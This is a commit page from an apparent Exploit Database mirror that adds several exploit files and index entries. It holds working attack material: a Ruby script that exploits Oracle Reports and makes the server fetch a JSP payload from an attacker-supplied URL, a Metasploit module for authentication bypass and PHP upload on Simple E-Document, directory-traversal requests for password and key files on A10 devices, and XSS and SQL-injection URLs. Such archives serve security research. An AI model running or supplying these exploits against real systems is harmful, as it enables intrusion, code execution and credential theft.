bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_31_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-31 04:26:59 +00:00
parent fe00572dd8
commit 3df1ce2164
28 changed files with 1221 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
files.csv
View file

@ -27304,7 +27304,7 @@ id,file,description,date,author,platform,type,port
30440,platforms/cgi/webapps/30440.txt,"WebEvent <= 4.03 Webevent.CGI Cross-Site Scripting Vulnerability",2007-07-31,d3hydr8,cgi,webapps,0
30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 Buffer Overflow Vulnerability",2007-07-31,"Code Audit Labs",windows,remote,0
30442,platforms/php/webapps/30442.txt,"WebDirector Index.PHP Cross Site Scripting Vulnerability",2007-08-01,r0t,php,webapps,0
30443,platforms/php/webapps/30443.txt,"Wordpress Persuasion Theme - Arbitrary File Download and File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80
30443,platforms/php/webapps/30443.txt,"Wordpress Persuasion Theme 2.x - Arbitrary File Download and File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80
30444,platforms/linux/dos/30444.txt,"KDE Konqueror <= 3.5.7 Assert Denial of Service Vulnerability",2007-03-05,"Thomas Waldegger",linux,dos,0
30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module mosConfig_absolute_path Remote File Include Vulnerability",2007-08-02,Yollubunlar.Org,php,webapps,0
30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 Duyuruoku.ASP SQL Injection Vulnerability",2007-08-02,Yollubunlar.Org,asp,webapps,0
@ -28067,3 +28067,30 @@ id,file,description,date,author,platform,type,port
31250,platforms/php/webapps/31250.txt,"XOOPS 'seminars' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80
31258,platforms/hardware/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,hardware,webapps,0
31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443
31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80
31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0
31264,platforms/php/remote/31264.rb,"Simple E-Document Arbitrary File Upload",2014-01-29,metasploit,php,remote,80
31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 docs/examples/redirect.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 docs/examples/handlervalidate.spy x Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 spyce/examples/request.spy name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 spyce/examples/getpost.spy Name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 spyce/examples/formtag.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0
31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component 'id' Parameter SQL Injection Vulnerability",2008-02-20,S@BUN,php,webapps,0
31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component 'secid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
31274,platforms/php/webapps/31274.txt,"Joomla! and Mambo 'com_asortyment' Component 'katid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0
31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Labels.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0
31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 ClassList.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0
31278,platforms/php/webapps/31278.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 GradebookStuScores.asp GrdBk Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0
31279,platforms/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 Calendar 'Count' Parameter Cross-Site Scripting Vulnerability",2008-02-21,"Nir Goldshlager AVNE",multiple,remote,0
31280,platforms/php/webapps/31280.txt,"Joomla! and Mambo Referenzen Component 'id' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
31281,platforms/php/webapps/31281.txt,"PHP-Nuke Classifieds Module 'Details' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 'print' Option SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module 'sid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module 'cid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
31286,platforms/asp/webapps/31286.txt,"Citrix MetaFrame Web Manager 'login.asp' Cross-Site Scripting Vulnerability",2008-02-22,Handrix,asp,webapps,0
31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 'recipeid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0

Can't render this file because it is too large.

10
platforms/asp/webapps/31275.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/27924/info
Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Aeries Student Information System 3.8.2.8 and 3.7.2.2; other versions may also be affected.
http://www.example.com/Comments.asp?&FC=SQL

9
platforms/asp/webapps/31276.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27924/info
Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Aeries Student Information System 3.8.2.8 and 3.7.2.2; other versions may also be affected.
http://www.example.com/Labels.asp?&Term=SQL

7
platforms/asp/webapps/31286.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27948/info
Citrix MetaFrame Web Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/Citrix/MetaFrameXP/default/login.asp?NFuse_LogoutId=Off&NFuse_MessageType=warning&NFuse_Message=%3Cscript%3Ealert(document.cookie);%3C/script%3E

384
platforms/hardware/webapps/31258.txt Executable file
View file

@ -0,0 +1,384 @@
Document Title:
===============
SimplyShare v1.4 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1181
Release Date:
=============
2014-01-28
Vulnerability Laboratory ID (VL-ID):
====================================
1181
Common Vulnerability Scoring System:
====================================
9.2
Product & Service Introduction:
===============================
SimplyShare is the ultimate tool to Transfer your Photos, Videos and Files easily to other iPhone/iPod Touch/iPad
and computers wirelessly (without any iTunes Sync). Download or upload photos/videos/files directly from a computer.
Store, manage and view MS Office, iWork, PDF files and many more features
Share Files, Photos or Videos:
- Transfer any number of files, photos or videos with any size to other iOS devices (iPhone, iPod Touch and iPad) via Wi-Fi
- Download files, photos or videos with any size to your computer via Wi-Fi
- Upload multiple files, photos or videos with any size from your computer to your device via WiFi
- Transfer your files via USB cable (iTunes sync)
- View all your photo albums, videos and files on your device from a computer
- Preserves all photos metadata after transfer
- Slideshow all the photos of an album on a computer (on web browser)
- Display your photos on other iOS devices without transfer/saving them
- Send a short/quick text message from your computer or other iOS devices to your own iDevice
- Email files or photos from your device
Download Files from Internet:
- Download files browsing the Internet
- Tap & Hold on any link or photos to save them in SimpyShare app
- Any webpage you visit, SimplyShare automatically generates all the links to supported files (MS Office,
iWork, PDF documents etc). Then you can download them by just a single tap.
- Download images automatically by simply tapping on any image in the webpage
File Manager:
- Open or Print Microsoft Office documents (Office 97 and newer)
- Open or Print iWork documents
- View or Print PDF files, Images, RTF documents, CSV, HTML and Text files
- Play Audio and Video files
- Move, Copy delete files/folder or create new folders
- Save images or videos to Photos Album
- Ability to create folders and organize the files within the folders
- iTunes USB sharing ...
( Copy of the Homepage: https://itunes.apple.com/en/app/simply-share/id399197227 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official SimplyShare v1.4 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2013-01-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: Rambax, LLC - SimplyShare 1.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A critical remote code execution web vulnerability has been discovered in the official SimplyShare v1.4 iOS mobile web-application.
Remote attackers are able to execute own system specific codes to compromise the affected web-application or the connected mobile device.
The remote vulnerability is located in the vulnerable `text` value of the `Send Text` module. Remote attackers can use the prompt send
text input to direct execute system codes or malicious application requests. The send text input field has no restrictions or secure
encoding to ensure direct code executes are prevented. After the inject the code execution occurs directly in the send text module
item list. The security risk of the remote code execution vulnerability is estimated as critical with a cvss (common vulnerability
scoring system) count of 9.2(+)|(-)9.3.
Exploitation of the code execution vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the remote code execution vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Send Text
Vulnerable Parameter(s):
[+] text
Affected Module(s):
[+] Access from Computer (Send Text Index List - Text Name & Context)
1.2
A local file/path include web vulnerability has been discovered in the official SimplyShare v1.4 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the web-application or mobile device.
The local file include web vulnerability is located in the vulnerable `filename` value of the `upload files` module (web-interface).
Remote attackers are able to inject own files with malicious filename to compromise the mobile application. The attack vector is
persistent and the request method is POST. The local file/path include execute occcurs in the main file to path section after the
refresh of the file upload. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common
vulnerability scoring system) count of 7.7(+)|(-)7.8.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized
local file include web attacks.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Upload Files
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Access from Computer (File Dir Index List - Folder/Category to path=/)
1.3
A local command/path injection web vulnerability has been discovered in the official SimplyShare v1.4 iOS mobile web-application.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile web-application.
The vulnerability is located in the in the title value of the header area. Local attackers are able to inject own script codes
as iOS device name. The execute of the injected script code occurs with persistent attack vector in the header section of the
web interface. The security risk of the command/path inject vulnerabilities are estimated as high with a cvss (common vulnerability
scoring system) count of 6.2(+)|(-)6.3.
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific
commands or unauthorized path requests.
Request Method(s):
[+] [GET]
Vulnerable Value(s):
[+] devicename
Vulnerable Parameter(s):
[+] value to title
Affected Module(s):
[+] Access from Computer (File Dir Index List) - [Header]
1.4
Multiple persistent input validation web vulnerabilities has been discovered in the official SimplyShare v1.4 iOS mobile web-application.
The bug allows remote attackers to implement/inject own malicious persistent script codes to the application-side of the vulnerable app.
The vulnerability is located in the `name` value of the internal photo and video module. The vulnerability can be exploited by manipulation
of the local device album names. After the local attacker with physical access injected the code to the local device foto app menu, he is able
to execute the persistent script codes on the application-side of the mobile app device. The security risk of the persistent script code inject
web vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.8(+)|(-)3.9.
Exploitation of the persistent web vulnerabilities requires low user interaction and no privileged web-application user account with a password.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks,
persistent phishing or persistent manipulation of module context.
Vulnerable Module(s):
[+] Video Folder Name
[+] Photos Folder Name
Vulnerable Parameter(s):
[+] album name values
Affected Module(s):
[+] Access from Computer (Photos & Videos Module)
Proof of Concept (PoC):
=======================
1.1
The remote code execution vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
For security demonstration or to reproduce the remote code execution vulnerability follow the provided steps and information below.
PoC: Send Text
<table class="ui-widget ui-widget-content" style="margin-bottom: 0;">
<thead>
<tr class="ui-widget-header">
<th></th>
<th>Name</th>
<th>Date</th>
<th>Size</th>
</tr>
</thead>
<tbody>
<tr class="ui-state-default">
<td></td><td colspan="3" class="name"><span class="ui-icon ui-icon-folder-collapsed"></span><a href="/?path=/">..</a></td>
</tr>
<tr class="ui-state-default">
<td><input value="/Texts/>" type="checkbox">"<<>"<">[REMOTE CODE EXECUTION VULNERABILITY!] s="" 137.txt"=""
filesize="550"></td><td class="name"><span class="ui-icon ui-icon-document"></span>
<a href="/Texts/>">"<<>"<"><[REMOTE CODE EXECUTION VULNERABILITY!] 137.txt</a></td><td>Jan. 23, 2014 14:07</td><td>0.5 KB</td></tr>
--- PoC Session Logs [GET] ---
14:13:14.499[93ms][total 1294ms] Status: 200[OK]
GET http://192.168.2.109/?path=/Texts Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[6608] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.109]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.109/]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Accept-Ranges[bytes]
Content-Length[6608]
Date[Do., 23 Jan. 2014 13:20:09 GMT]
14:13:14.612[33ms][total 33ms] Status: 200[OK]
GET http://192.168.2.109/rambax/server/jquery-ui-1.8.5.custom.css Load Flags[VALIDATE_ALWAYS ] Content Size[22041] Mime Type[text/css]
Request Headers:
Host[192.168.2.109]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.109/?path=/Texts]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Accept-Ranges[bytes]
Content-Length[22041]
Content-Type[text/css]
Date[Do., 23 Jan. 2014 13:20:09 GMT]
1.2
The file include web vulnerability can be exploited by remote attackers without user interaction and privileged web-application user account.
For security demonstration or to reproduce the file/path include web vulnerability follow the provided steps and information below.
PoC: Upload Files - Filename
<tr class="ui-state-default">
<td><input value="/Documents/[FILE INCLUDE VULNERABILITY VIA FILENAME]" filesize="723" type="checkbox"></td>
<td class="name"><span class="ui-icon ui-icon-document"></span>
<a href="/Documents/[FILE INCLUDE VULNERABILITY VIA FILENAME]">[FILE INCLUDE VULNERABILITY VIA FILENAME]</a></td>
<td>Jan. 23, 2014 14:04</td><td>0.7 KB</td></tr>
1.3
The local command inject web vulnerability can be exploited by remote attackers without user interaction and privileged web-application user account.
Physical device access or resource access is required to exploit the local command inject vulnerability. For security demonstration or to reproduce
the local command inject vulnerability follow the provided steps and information below.
PoC: Title - Header
<body>
<div class="visible-div">
<img src="/rambax/server/SimplyShare-icon.png">
<div id="title">bkm¥337[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE]</div>
<div id="header-links">
1.4
The persistent input validation web vulnerabilities can be exploited by remote attackers without privileged application user account but with
low or medium user interaction. For security demonstration or to reproduce the persistent vulnerabilities follow the provided steps and information below.
PoC: Albums > name
<div id="albums">
<ul class="column">
<li><div class="block"><a href="/rambax/album/0-x"
title="Camera Roll (137)"><img src="/rambax/album_poster/0.jpg" class="photo"></a><span>Camera Roll (137)</span></div></li>
<li><div class="block">
<a href="/rambax/album/1" title="bkm"><[PERSISTENT INJECTED SCRIPT CODE!]"> (1)"><img src="/rambax/album_poster/1.jpg"
class="photo"/></a><span>bkm"><[PERSISTENT INJECTED SCRIPT CODE!]> (1)</span></div></li>
</ul>
</div>
Solution - Fix & Patch:
=======================
1.1
The first vulnerability can be patched by a secure restriction and encode of the send text input field with the text value parameter.
Ensure the output send text item list module only displays secure parsed, encoded and validated context.
1.2
The second vulnerability can be patched by a secure parse and encode of the file name value parameter in the Upload File POST method request.
1.3
The third vulnerability can be patched by encoding the header section with the title value parameter to prevent physical command injection attacks.
1.4
Encode the photo album and video names to prevent persistent script code injection attacks by local stored album components of the foto (photo) app.
Security Risk:
==============
1.1
The security risk of the remote code exection vulnerability is estimated as critical.
1.2
The security risk of the local file include web vulnerability is estimated as high(+).
1.3
The security risk of the local command inject web vulnerability is estimated as high(-).
1.4
The security risk of the persistent script code inject web vulnerabilities via POST method request are estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

68
platforms/hardware/webapps/31261.txt Executable file
View file

@ -0,0 +1,68 @@
-----------
Author:
-----------
xistence < xistence[at]0x90[.]nl >
-------------------------
Affected products:
-------------------------
A10 Networks Loadbalancer (Soft)AX <=2.6.1-GR1-P5 & <=2.7.0 build 217
-------------------------
Affected vendors:
-------------------------
A10Networks
http://www.a10networks.com/
-------------------------
Product description:
-------------------------
SupportCenter Plus is a web-based customer support software that lets
organizations effectively manage customer tickets,
their account & contact information, the service contracts and in the
process providing a superior customer experience.
----------
Details:
----------
[ 0x01 - Directory Traversal ]
A10 Networks (Soft)AX <=2.6.1-GR1-P5 & <=2.7.0 build 217 is prone to an
unauthenticated directory traversal vulnerability.
It's possible to download any file on the remote AX device with root
privileges, without the need to authenticate to the website.
The bug was fixed earlier in A10 Tracking ID "82150" according to the
release notes, however the fix is not sufficient and can be bypassed.
The new protection seems to make sure files are under the /a10data/tmp dir
(https://<IP>/xml/downloads/?filename=/a10data/tmp/).
By sending a GET request to
"https://<IP>/xml/downloads/?filename=/a10data/tmp/../.."
and thus keeping /a10data/tmp, we can bypass this. So if we would like
to download the file /etc/shadow we send a GET request to "https://
<IP>/xml/downloads/?filename=/a10data/tmp/../../etc/passwd".
Or if we would like to download a certificate key file: "https://
<IP>/xml/downloads/?filename=/a10data/tmp/../../a10data/key/domain.com"
WARNING: Downloading a file will delete it from the AX device!
-----------
Solution:
-----------
Upgrade to a newer version.
--------------
Timeline:
--------------
Fixed somewhere back in 2013 :)

128
platforms/jsp/remote/31253.rb Executable file
View file

@ -0,0 +1,128 @@
#!/usr/bin/env ruby
# Exploit Title: Oracle Reports 11.1
# About: Automated exploit for CVE-2012-3153/CVE-2012-3152
# Google Dork: inurl:/reports/rwservlet/
# Date: 01/28/2014
# Exploit Author: Mekanismen <mattias@gotroot.eu>
# Credits to: @miss_sudo for initial disclosure
# Reference: http://netinfiltration.com/
# Vendor Homepage: http://www.oracle.com/
# Version: 11.1
# Tested on: Linux
# CVE-2012-3153
# CVE-2012-3152
require 'uri'
require 'open-uri'
require 'openssl'
#OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
def upload_payload(dest)
url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'"
#print url
begin
uri = URI.parse(url)
html = uri.open.read
rescue
html = ""
end
if html =~ /Successfully run/
@hacked = true
print "[+] Payload uploaded!\n"
else
print "[-] Payload uploaded failed\n"
end
end
def getenv(server, authid)
print "[+] Found server: #{server}\n"
print "[+] Found credentials: #{authid}\n"
print "[*] Querying showenv ... \n"
begin
uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}")
html = uri.open.read
rescue
html = ""
end
if html =~ /\/(.*)\/showenv/
print "[+] Query succeeded, uploading payload ... \n"
upload_payload($1)
else
print "[-] Query failed... \n"
end
end
@payload_url = "" #the url that holds our payload (we can execute .jsp on the server)
@url = "" #url to compromise
@hacked = false
@payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp"
print "[*] PWNACLE Fusion - Mekanismen <mattias@gotroot.eu>\n"
print "[*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n"
print "[*] Credits to: @miss_sudo\n"
unless ARGV[0] and ARGV[1]
print "[-] Usage: ./pwnacle.rb target_url payload_url\n"
exit
end
@url = ARGV[0]
@payload_url = ARGV[1]
print "[*] Target URL: #{@url}\n"
print "[*] Payload URL: #{@payload_url}\n"
print "[*] Payload name: #{@payload_name}\n"
begin
#Can we view keymaps?
uri = URI.parse("#{@url}/reports/rwservlet/showmap")
html = uri.open.read
rescue
print "[-] URL not vulnerable or unreachable\n"
exit
end
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
#Parse keymaps for servers
print "[*] Enumerating keymaps ... \n"
test.each do |t|
if not @hacked
t = t.delete(' ')
url = "#{@url}/reports/rwservlet/parsequery?#{t}"
begin
uri = URI.parse(url)
html = uri.open.read
rescue
end
#to automate exploitation we need to query showenv for a local path
#we need a server id and creds for this, we enumerate the keymaps and hope for the best
#showenv tells us the local PATH of /reports/ where we upload the shell
#so we can reach it from /reports/images/<shell>.jsp
if html =~ /userid=(.*)@/
authid = $1
end
if html =~ /server=(\S*)/
server = $1
end
if server and authid
getenv(server, authid)
end
else
break
end
end
if @hacked
print "[*] Server hopefully compromised!\n"
print "[*] Payload url: #{@url}/reports/images/#{@payload_name}\n"
else
print "[*] Enumeration done ... no vulnerable keymaps for automatic explotation found :(\n"
#server is still vulnerable but cannot be automatically exploited ... i guess
end

9
platforms/multiple/remote/31279.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27925/info
IBM Lotus Quickr is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Lotus Quickr 8.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/?OpenDocument&Count='20"><iframe/%20/onload=alert(/XSSByNirG/<http://www.example.com/QuickPlace/leg/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/?OpenDocument&Count='20%22%3E%3Ciframe/%20/onload=alert(/XSSByNirG/>)>

149
platforms/php/remote/31264.rb Executable file
View file

@ -0,0 +1,149 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Simple E-Document Arbitrary File Upload",
'Description' => %q{
This module exploits a file upload vulnerability found in Simple
E-Document versions 3.0 to 3.1. Attackers can bypass authentication and
abuse the upload feature in order to upload malicious PHP files which
results in arbitrary remote code execution as the web server user. File
uploads are disabled by default.
},
'License' => MSF_LICENSE,
'Author' =>
[
'vinicius777[at]gmail.com', # Auth bypass discovery and PoC, kinda
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
# This EDB uses SQLI for auth bypass which isn't needed.
# Sending "Cookie: access=3" with all requests is all
# that's needed for auth bypass.
['EDB', '31142']
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as an HTTP
# response body, so really it's unlimited
'Space' => 262144 # 256k
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on Simple E-Document versions 3.0 and 3.1
[ 'Generic (PHP Payload)', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Jan 23 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Simple E-Document', '/simple_e_document_v_1_31/'])
], self.class)
end
#
# Checks if target allows file uploads
#
def check
res = send_request_raw({
'uri' => normalize_uri(target_uri.path, 'upload.php'),
'cookie' => 'access=3'
})
unless res
vprint_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/
vprint_error("#{peer} - File uploads are disabled")
return Exploit::CheckCode::Safe
end
if res.body and res.body.to_s =~ /Upload File/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
#
# Uploads our malicious file
#
def upload
@fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
php = "<?php #{payload.encoded} ?>"
data = Rex::MIME::Message.new
data.add_part('upload', nil, nil, 'form-data; name="op1"')
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
print_status("#{peer} - Uploading malicious file...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'upload.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => 'access=3',
'data' => post_data,
'vars_get' => {
'op' => 'newin'
}
})
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") unless res
fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/)
print_good("#{peer} - Payload uploaded successfully.")
register_files_for_cleanup(@fname)
if res.body.to_s =~ /<br>folder to use: .+#{target_uri.path}\/?(.+)<br>/
@upload_path = normalize_uri(target_uri.path, "#{$1}")
print_good("#{peer} - Found upload path #{@upload_path}")
else
@upload_path = normalize_uri(target_uri.path, 'in')
print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'")
end
end
#
# Executes our uploaded malicious file
#
def exec
print_status("#{peer} - Executing #{@fname}...")
res = send_request_raw({
'uri' => normalize_uri(@upload_path, @fname),
'cookie' => 'access=3'
})
if res and res.code == 404
fail_with(Failure::NotFound, "#{peer} - Not found: #{@fname}")
end
end
#
# Just upload and execute
#
def exploit
upload
exec
end
end

62
platforms/php/webapps/31262.txt Executable file
View file

@ -0,0 +1,62 @@
-----------
